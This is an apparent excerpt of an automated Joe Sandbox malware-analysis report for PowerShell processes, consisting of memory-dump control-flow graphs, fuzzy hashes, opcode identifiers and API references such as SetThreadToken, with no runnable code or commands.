                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: fcq$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                            • API String ID: 0-2717029046
                                                                                                                                                                            • Opcode ID: 2c72c1bb5e5cd9b6c77a0cc8dc89ccf7676a2d963bc7fbf8c872a1f9b088f43a
                                                                                                                                                                            • Instruction ID: dfe41c4c4dd445c2dce19ada0b3b727eda1794ddd78877ae7c7ddcf13bcdcdca
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c72c1bb5e5cd9b6c77a0cc8dc89ccf7676a2d963bc7fbf8c872a1f9b088f43a
                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF17CB17043458FDB25AB69D414B6ABBE2EFC2210F14C0FBD645CB292DA39CC81C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-3272787073
                                                                                                                                                                            • Opcode ID: 5d6dd74cc665908a91408d42d5763c19e655f3bcc94f90537312bf4ddd483898
                                                                                                                                                                            • Instruction ID: a2e56511ad6178c8341d521e8f29e8d1029907317698d1dd79b2e5463eb93ae4
                                                                                                                                                                            • Opcode Fuzzy Hash: 5d6dd74cc665908a91408d42d5763c19e655f3bcc94f90537312bf4ddd483898
                                                                                                                                                                            • Instruction Fuzzy Hash: DE513AF17043069FEB245A6994087B6BBE6EFC2620F1484ABD605CB351DE3DC885C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                            • API String ID: 0-3297199963
                                                                                                                                                                            • Opcode ID: 4eeb5f717a8617e61d829ecab64018390a0ab0de1f4347531ffb8067f7c34fb5
                                                                                                                                                                            • Instruction ID: 7242abb70ac60b80d0c4e2034af26b5758d596f8faf2c30b1fd80dcdf662bc89
                                                                                                                                                                            • Opcode Fuzzy Hash: 4eeb5f717a8617e61d829ecab64018390a0ab0de1f4347531ffb8067f7c34fb5
                                                                                                                                                                            • Instruction Fuzzy Hash: 6FB19474E006199FCB54DFA9D990A9DFBF2FF88300F10862AD419AB314EB34A945CF90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                            • API String ID: 0-3297199963
                                                                                                                                                                            • Opcode ID: 6e5c3fd496f0ea02c12992d260537c2a7e94ab8e3db43bbf9086ec112ce2f7eb
                                                                                                                                                                            • Instruction ID: 8e76b8d36315c14ed81ea88e863db804f4b1b0bfaf9426cd6f5419d950ed5c7d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e5c3fd496f0ea02c12992d260537c2a7e94ab8e3db43bbf9086ec112ce2f7eb
                                                                                                                                                                            • Instruction Fuzzy Hash: D4B19374E006199FCB54DFA9D990A9DFBF2FF88300F10862AD419AB314EB35A945CF90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2125118731
                                                                                                                                                                            • Opcode ID: 4283d8274e6c667d33b0e876eb7ad2af110a0c8c304fb23d0782cbfbff8c75a2
                                                                                                                                                                            • Instruction ID: af6b96efde3f09c35717f62c71989111dc993996e05bb116a4176d10a7dec021
                                                                                                                                                                            • Opcode Fuzzy Hash: 4283d8274e6c667d33b0e876eb7ad2af110a0c8c304fb23d0782cbfbff8c75a2
                                                                                                                                                                            • Instruction Fuzzy Hash: BE2129F170030A9BEB38592A984CB37A7DAAFC0B15F24846AA605CF785DD7DC8618371
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2049395529
                                                                                                                                                                            • Opcode ID: c57a611372f1aafb8059292f9cc5d0457e053e8c728190f888910e2a27a9a04e
                                                                                                                                                                            • Instruction ID: e2fc9df49d77dfe08e7edb7c7a18b1fafef8aa22c2f0b228b727aab7876a14bf
                                                                                                                                                                            • Opcode Fuzzy Hash: c57a611372f1aafb8059292f9cc5d0457e053e8c728190f888910e2a27a9a04e
                                                                                                                                                                            • Instruction Fuzzy Hash: 9701D1A1B4D39A5FD72B262918285546FF2AF8395031A45EBC140CF29BCD1A4C4D87A7

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:5.5%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:3
                                                                                                                                                                            Total number of Limit Nodes:0
                                                                                                                                                                            execution_graph 20328 8277a48 20329 8277a8b SetThreadToken 20328->20329 20330 8277ab9 20329->20330

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 326 467b565-467b599 327 467b59e-467b8d9 call 467b1ec 326->327 328 467b59b 326->328 389 467b8de-467b8e5 327->389 328->327
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: [TDn^$kTDn^${TDn^$[Dn^
                                                                                                                                                                            • API String ID: 0-1515681306
                                                                                                                                                                            • Opcode ID: 53ac42df71edfcf31f8c6e80d53cbc427111c2e2efb66744f60f9f5c0e392fd6
                                                                                                                                                                            • Instruction ID: 89caf719afd52891fcfadd40f3ff3289c60f1fbfc630f420f7abeef4cb5cf130
                                                                                                                                                                            • Opcode Fuzzy Hash: 53ac42df71edfcf31f8c6e80d53cbc427111c2e2efb66744f60f9f5c0e392fd6
                                                                                                                                                                            • Instruction Fuzzy Hash: 52918575F006146BDB1AEFB4D8145AEB7E3DF85704B00892DD00AAB344DF74AD0A8BD6

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 390 467b580-467b599 391 467b59e-467b8d9 call 467b1ec 390->391 392 467b59b 390->392 453 467b8de-467b8e5 391->453 392->391
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: [TDn^$kTDn^${TDn^$[Dn^
                                                                                                                                                                            • API String ID: 0-1515681306
                                                                                                                                                                            • Opcode ID: a34a1a0ddcd8c83b680f57413fec709014c8511911d2ace45e0e849523bc9616
                                                                                                                                                                            • Instruction ID: 32e8d2e5f82b08740af07ac67431c64cc52aa48f3bb9c8c79ac925bc721fa13c
                                                                                                                                                                            • Opcode Fuzzy Hash: a34a1a0ddcd8c83b680f57413fec709014c8511911d2ace45e0e849523bc9616
                                                                                                                                                                            • Instruction Fuzzy Hash: F99131B5F006196BDF19EFB498145AEB7E3EF84704B00892DD10AAB344DF74AD068BD6

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 70a2308-70a232d 1 70a2333-70a2338 0->1 2 70a24b5-70a24d5 0->2 3 70a233a-70a2340 1->3 4 70a2350-70a2354 1->4 10 70a24d7-70a24fd 2->10 11 70a24b4 2->11 6 70a2342 3->6 7 70a2344-70a234e 3->7 8 70a235a-70a235e 4->8 9 70a2462-70a246c 4->9 6->4 7->4 14 70a2360-70a236f 8->14 15 70a2371 8->15 12 70a247a-70a2480 9->12 13 70a246e-70a2477 9->13 16 70a26da 10->16 17 70a2503-70a2508 10->17 11->2 18 70a2482-70a2484 12->18 19 70a2486-70a2492 12->19 21 70a2373-70a2375 14->21 15->21 26 70a26dc-70a26f4 16->26 22 70a250a-70a2510 17->22 23 70a2520-70a252c 17->23 24 70a2494-70a24b2 18->24 19->24 21->9 25 70a237b-70a237d 21->25 27 70a2512 22->27 28 70a2514-70a251e 22->28 40 70a2532-70a2535 23->40 41 70a2681-70a268b 23->41 30 70a237f-70a238b 25->30 31 70a238d 25->31 33 70a26f6-70a26fd 26->33 34 70a2757-70a2767 26->34 27->23 28->23 32 70a238f-70a2391 30->32 31->32 32->9 37 70a2397-70a239b 32->37 33->26 38 70a26ff-70a2725 33->38 52 70a276b-70a276d 34->52 45 70a23be 37->45 46 70a239d-70a23a6 37->46 47 70a272b-70a2730 38->47 48 70a28c4-70a28de 38->48 40->41 42 70a253b-70a2542 40->42 49 70a2699-70a269f 41->49 50 70a268d-70a2696 41->50 42->16 51 70a2548-70a254d 42->51 59 70a23c1-70a23c3 45->59 53 70a23a8-70a23ab 46->53 54 70a23ad-70a23ba 46->54 55 70a2748-70a274c 47->55 56 70a2732-70a2738 47->56 57 70a26a1-70a26a3 49->57 58 70a26a5-70a26b1 49->58 60 70a254f-70a2555 51->60 61 70a2565-70a2569 51->61 62 70a2773-70a2775 52->62 63 70a2871-70a287b 52->63 64 70a23bc 53->64 54->64 55->63 71 70a2752-70a2756 55->71 65 70a273a 56->65 66 70a273c-70a2746 56->66 67 70a26b3-70a26d7 57->67 58->67 68 70a23dd-70a23ef 59->68 69 70a23c5-70a23cb 59->69 73 70a2559-70a2563 60->73 74 70a2557 60->74 61->41 78 70a256f-70a2573 61->78 75 70a2777-70a2783 62->75 76 70a2785 62->76 82 70a2889-70a288f 63->82 83 70a287d-70a2886 63->83 64->59 65->55 66->55 92 70a23f1-70a23f4 68->92 93 70a23f6-70a2453 68->93 80 70a23cf-70a23db 69->80 81 70a23cd 69->81 71->34 72 70a2769 71->72 72->52 73->61 74->61 88 70a2787-70a2789 75->88 76->88 78->41 89 70a2579-70a257d 78->89 80->68 81->68 84 70a2891-70a2893 82->84 85 70a2895-70a28a1 82->85 91 70a28a3-70a28c1 84->91 85->91 88->63 95 70a278f-70a27a9 88->95 96 70a257f-70a258e 89->96 97 70a2590 89->97 101 70a2458-70a245f 92->101 93->101 107 70a27ab-70a27b4 95->107 108 70a27cc 95->108 102 70a2592-70a2594 96->102 97->102 102->41 106 70a259a-70a259c 102->106 109 70a259e-70a25aa 106->109 110 70a25ac 106->110 115 70a27bb-70a27c8 107->115 116 70a27b6-70a27b9 107->116 112 70a27cf-70a27d1 108->112 111 70a25ae-70a25b0 109->111 110->111 111->41 117 70a25b6-70a25e8 111->117 118 70a27eb-70a27f1 112->118 119 70a27d3-70a27d9 112->119 120 70a27ca 115->120 116->120 136 70a25ea-70a25f0 117->136 137 70a2602-70a2613 117->137 155 70a27f4 call 46776a0 118->155 156 70a27f4 call 46776b0 118->156 121 70a27db 119->121 122 70a27dd-70a27e9 119->122 120->112 121->118 122->118 126 70a27f7-70a27fe 128 70a2800-70a2803 126->128 129 70a2805-70a2862 126->129 132 70a2867-70a286e 128->132 129->132 140 70a25f2 136->140 141 70a25f4-70a2600 136->141 146 70a2617-70a2623 137->146 147 70a2615 137->147 140->137 141->137 148 70a2625-70a267e 146->148 147->148 155->126 156->126
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2622293718.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_70a0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$pipj$pipj$pipj$pipj$pipj$|,rj
                                                                                                                                                                            • API String ID: 0-1806894991
                                                                                                                                                                            • Opcode ID: 403b7124da4508c49ce8eabbc8af5e57cd0d65f9ba45c3cb55e9865904fffca1
                                                                                                                                                                            • Instruction ID: f26e000ad7e61e3a25b6527e20a95c54877f2468297555545900a8ffcce6c4a3
                                                                                                                                                                            • Opcode Fuzzy Hash: 403b7124da4508c49ce8eabbc8af5e57cd0d65f9ba45c3cb55e9865904fffca1
                                                                                                                                                                            • Instruction Fuzzy Hash: 260229B1B00206AFCF54DFA9D4406AABBE6BFC6210F1485BAE415CB251DB35CD85C7A1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 157 70a3ce8-70a3d0d 158 70a3d13-70a3d18 157->158 159 70a3f00-70a3f4a 157->159 160 70a3d1a-70a3d20 158->160 161 70a3d30-70a3d34 158->161 169 70a40ce-70a4112 159->169 170 70a3f50-70a3f55 159->170 163 70a3d22 160->163 164 70a3d24-70a3d2e 160->164 165 70a3d3a-70a3d3c 161->165 166 70a3eb0-70a3eba 161->166 163->161 164->161 167 70a3d3e-70a3d4a 165->167 168 70a3d4c 165->168 171 70a3ec8-70a3ece 166->171 172 70a3ebc-70a3ec5 166->172 173 70a3d4e-70a3d50 167->173 168->173 191 70a4228-70a425d 169->191 192 70a4118-70a411d 169->192 174 70a3f6d-70a3f71 170->174 175 70a3f57-70a3f5d 170->175 176 70a3ed0-70a3ed2 171->176 177 70a3ed4-70a3ee0 171->177 173->166 181 70a3d56-70a3d75 173->181 179 70a4080-70a408a 174->179 180 70a3f77-70a3f79 174->180 182 70a3f5f 175->182 183 70a3f61-70a3f6b 175->183 185 70a3ee2-70a3efd 176->185 177->185 187 70a408c-70a4094 179->187 188 70a4097-70a409d 179->188 189 70a3f7b-70a3f87 180->189 190 70a3f89 180->190 220 70a3d77-70a3d83 181->220 221 70a3d85 181->221 182->174 183->174 196 70a409f-70a40a1 188->196 197 70a40a3-70a40af 188->197 195 70a3f8b-70a3f8d 189->195 190->195 213 70a428b-70a4295 191->213 214 70a425f-70a4281 191->214 193 70a411f-70a4125 192->193 194 70a4135-70a4139 192->194 201 70a4129-70a4133 193->201 202 70a4127 193->202 205 70a41da-70a41e4 194->205 206 70a413f-70a4141 194->206 195->179 203 70a3f93-70a3fb2 195->203 204 70a40b1-70a40cb 196->204 197->204 201->194 202->194 244 70a3fc2 203->244 245 70a3fb4-70a3fc0 203->245 215 70a41f1-70a41f7 205->215 216 70a41e6-70a41ee 205->216 210 70a4143-70a414f 206->210 211 70a4151 206->211 219 70a4153-70a4155 210->219 211->219 225 70a429f-70a42a5 213->225 226 70a4297-70a429c 213->226 255 70a4283-70a4288 214->255 256 70a42d5-70a42fe 214->256 223 70a41f9-70a41fb 215->223 224 70a41fd-70a4209 215->224 219->205 231 70a415b-70a415d 219->231 229 70a3d87-70a3d89 220->229 221->229 232 70a420b-70a4225 223->232 224->232 227 70a42ab-70a42b7 225->227 228 70a42a7-70a42a9 225->228 233 70a42b9-70a42d2 227->233 228->233 229->166 235 70a3d8f-70a3d96 229->235 236 70a415f-70a4165 231->236 237 70a4177-70a417e 231->237 235->159 247 70a3d9c-70a3da1 235->247 248 70a4169-70a4175 236->248 249 70a4167 236->249 241 70a4180-70a4186 237->241 242 70a4196-70a41d7 237->242 250 70a418a-70a4194 241->250 251 70a4188 241->251 254 70a3fc4-70a3fc6 244->254 245->254 257 70a3db9-70a3dc8 247->257 258 70a3da3-70a3da9 247->258 248->237 249->237 250->242 251->242 254->179 260 70a3fcc-70a4003 254->260 274 70a432d-70a435c 256->274 275 70a4300-70a4326 256->275 257->166 269 70a3dce-70a3dec 257->269 261 70a3dab 258->261 262 70a3dad-70a3db7 258->262 280 70a401d-70a4024 260->280 281 70a4005-70a400b 260->281 261->257 262->257 269->166 284 70a3df2-70a3e17 269->284 282 70a435e-70a437b 274->282 283 70a4395-70a439f 274->283 275->274 290 70a403c-70a407d 280->290 291 70a4026-70a402c 280->291 286 70a400f-70a401b 281->286 287 70a400d 281->287 300 70a437d-70a438f 282->300 301 70a43e5-70a43ea 282->301 288 70a43a8-70a43ae 283->288 289 70a43a1-70a43a5 283->289 284->166 308 70a3e1d-70a3e24 284->308 286->280 287->280 296 70a43b0-70a43b2 288->296 297 70a43b4-70a43c0 288->297 293 70a402e 291->293 294 70a4030-70a403a 291->294 293->290 294->290 299 70a43c2-70a43e2 296->299 297->299 300->283 301->300 309 70a3e6a-70a3e9d 308->309 310 70a3e26-70a3e41 308->310 322 70a3ea4-70a3ead 309->322 314 70a3e5b-70a3e5f 310->314 315 70a3e43-70a3e49 310->315 319 70a3e66-70a3e68 314->319 316 70a3e4b 315->316 317 70a3e4d-70a3e59 315->317 316->314 317->314 319->322
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2622293718.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_70a0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                            • API String ID: 0-1420252700
                                                                                                                                                                            • Opcode ID: 7818b1ed77deabdb97e1f26b5f69b0278c754027bfcedc03392823b212f4def2
                                                                                                                                                                            • Instruction ID: 404d6b14006f609f442c1594089e5f0886072d55e93c7188d4cd365ffac7245f
                                                                                                                                                                            • Opcode Fuzzy Hash: 7818b1ed77deabdb97e1f26b5f69b0278c754027bfcedc03392823b212f4def2
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C1247B5B04346AFCB559BAC980076ABBE6AFC2310F24817AE445CF391DF75C885C7A1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 454 467e011-467e018 455 467e073-467e09d 454->455 456 467e01a-467e035 454->456 457 467e09f 455->457 458 467e0a9-467e1c6 455->458 462 467e037 456->462 463 467e03e 456->463 457->458 485 467e1da 458->485 486 467e1c8-467e1d8 458->486 462->463 465 467e046-467e050 463->465 524 467e052 call 467deb1 465->524 525 467e052 call 467dec0 465->525 467 467e058-467e05b 487 467e1df-467e1e1 485->487 486->487 488 467e1f4-467e20c 487->488 489 467e1e3-467e1ec 487->489 491 467e220 488->491 492 467e20e-467e21e 488->492 489->488 493 467e226-467e29b 491->493 492->493 505 467e2a7-467e2bc 493->505 506 467e29d 493->506 508 467e2c3-467e2e7 505->508 509 467e2be 505->509 506->505 512 467e2f7 508->512 513 467e2e9-467e2f5 508->513 509->508 514 467e2f9-467e33d 512->514 513->514 521 467e347 514->521 522 467e33f 514->522 523 467e348 521->523 522->521 523->523 524->467 525->467
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: bq$4'^q
                                                                                                                                                                            • API String ID: 0-1488691314
                                                                                                                                                                            • Opcode ID: 802fe9b6f1521aaf819bfae7b74dc92a42158532f5e92deead3a30413307220b
                                                                                                                                                                            • Instruction ID: 57dd5d58cef069b92348110efe48d89cf15346af16dfbc025453ad8f5592b92d
                                                                                                                                                                            • Opcode Fuzzy Hash: 802fe9b6f1521aaf819bfae7b74dc92a42158532f5e92deead3a30413307220b
                                                                                                                                                                            • Instruction Fuzzy Hash: 61919F34B002058FCB04DF68D450AAEBBF2EF89314F1584A8D005AF365DB75EC4ACB91

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 526 8277a41-8277a83 528 8277a8b-8277ab7 SetThreadToken 526->528 529 8277ac0-8277add 528->529 530 8277ab9-8277abf 528->530 530->529
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2628149258.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_8270000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ThreadToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3254676861-0
                                                                                                                                                                            • Opcode ID: 39847e741b03141305c8a4a5e49a846e21c3332a2dea177fb4086aaf2bde87e2
                                                                                                                                                                            • Instruction ID: 56a8c6cf857b24fe06ca3ae647c9dbb4f7f64757128246311bc0939245ff353a
                                                                                                                                                                            • Opcode Fuzzy Hash: 39847e741b03141305c8a4a5e49a846e21c3332a2dea177fb4086aaf2bde87e2
                                                                                                                                                                            • Instruction Fuzzy Hash: 131143B19003099FDB10CFAAC884BDEFFF4EB48324F24842AD459A3210C775A944CFA4

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 533 8277a48-8277ab7 SetThreadToken 535 8277ac0-8277add 533->535 536 8277ab9-8277abf 533->536 536->535
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2628149258.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_8270000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ThreadToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3254676861-0
                                                                                                                                                                            • Opcode ID: 50ce02ffffc4c5d802ffca253952faf5ac1c4fad0d7ad6a0c5eea265e895b94e
                                                                                                                                                                            • Instruction ID: 569d1ca713d7a285926a13c46959f8d9d09a0e73a9815d85ba92127990971c28
                                                                                                                                                                            • Opcode Fuzzy Hash: 50ce02ffffc4c5d802ffca253952faf5ac1c4fad0d7ad6a0c5eea265e895b94e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F1136B19003088FDB10CF9AC944BDEFBF4EB48324F14842AD459A7310C775A944CFA4

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 539 46776b0-46776cf 540 46777d5-4677833 539->540 541 46776d5-46776d8 539->541 569 46776da call 46775e6 541->569 570 46776da call 46775ff 541->570 542 46776e0-46776f2 544 46776f4 542->544 545 46776fe-4677713 542->545 544->545 551 467779e-46777b7 545->551 552 4677719-4677729 545->552 557 46777c2-46777c3 551->557 558 46777b9 551->558 554 4677735-467774d 552->554 555 467772b 552->555 563 467774f-467775f 554->563 564 467778d-4677798 554->564 555->554 557->540 558->557 565 4677761-4677779 563->565 566 467777b-4677785 563->566 564->551 564->552 565->564 566->564 569->542 570->542
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (bq
                                                                                                                                                                            • API String ID: 0-149360118
                                                                                                                                                                            • Opcode ID: f04142c525b3af5209ab737438faf64e003219aafda033e51c7f72925ecf85cb
                                                                                                                                                                            • Instruction ID: 45b266b5e04941304c072cd9aed2d29019499451d323d65f3d550b5602df635e
                                                                                                                                                                            • Opcode Fuzzy Hash: f04142c525b3af5209ab737438faf64e003219aafda033e51c7f72925ecf85cb
                                                                                                                                                                            • Instruction Fuzzy Hash: 49415C78B042548FCB15DF68C554AA97BF2EF8E311F2440A9E406EB3A1EB35ED42CB51

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 571 467b088-467b091 call 467a7a4 573 467b096-467b09a 571->573 574 467b09c-467b0a9 573->574 575 467b0aa-467b145 573->575 584 467b147-467b14d 575->584 585 467b14e-467b16b 575->585 584->585
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (&^q
                                                                                                                                                                            • API String ID: 0-2067289071
                                                                                                                                                                            • Opcode ID: 68d6b2ae64b031738cf0f62d3eedba0a1e93117af4b14c303692755707826b3d
                                                                                                                                                                            • Instruction ID: fac51ac0dc226e10dbea64ed172c8490216f56b08767d2f20e9b51e14f34fae2
                                                                                                                                                                            • Opcode Fuzzy Hash: 68d6b2ae64b031738cf0f62d3eedba0a1e93117af4b14c303692755707826b3d
                                                                                                                                                                            • Instruction Fuzzy Hash: 88219A75A042588FCB14DFAED80469EBBF6EB88324F24846AD019E7340DB75A8058FA5

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 704 46729f0-4672a1e 705 4672af5-4672b37 704->705 706 4672a24-4672a3a 704->706 711 4672c51-4672c8f 705->711 712 4672b3d-4672b56 705->712 707 4672a3f-4672a52 706->707 708 4672a3c 706->708 707->705 715 4672a58-4672a65 707->715 708->707 723 4672d02-4672d47 711->723 724 4672c91-4672c97 711->724 713 4672b5b-4672b69 712->713 714 4672b58 712->714 713->711 721 4672b6f-4672b79 713->721 714->713 717 4672a67 715->717 718 4672a6a-4672a7c 715->718 717->718 718->705 727 4672a7e-4672a88 718->727 725 4672b87-4672b94 721->725 726 4672b7b-4672b7d 721->726 725->711 728 4672b9a-4672baa 725->728 726->725 729 4672a96-4672aa6 727->729 730 4672a8a-4672a8c 727->730 733 4672baf-4672bbd 728->733 734 4672bac 728->734 729->705 731 4672aa8-4672ab2 729->731 730->729 736 4672ab4-4672ab6 731->736 737 4672ac0-4672af4 731->737 733->711 742 4672bc3-4672bd3 733->742 734->733 736->737 743 4672bd5 742->743 744 4672bd8-4672be5 742->744 743->744 744->711 748 4672be7-4672bf7 744->748 749 4672bfc-4672c08 748->749 750 4672bf9 748->750 749->711 752 4672c0a-4672c24 749->752 750->749 753 4672c26 752->753 754 4672c29-4672c38 752->754 753->754 756 4672c3d-4672c50 754->756
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000017.00000002.2590210505.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_23_2_4670000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dc419f1b7578c26817ddd446b1d23c00e7eac5e973fde7f8f056dee9ec9790cf
                                                                                                                                                                            • Instruction ID: 29a61680211ac9cff19d8b4a8c825fae3423e6547e590ab6451c8aad704a6a8e
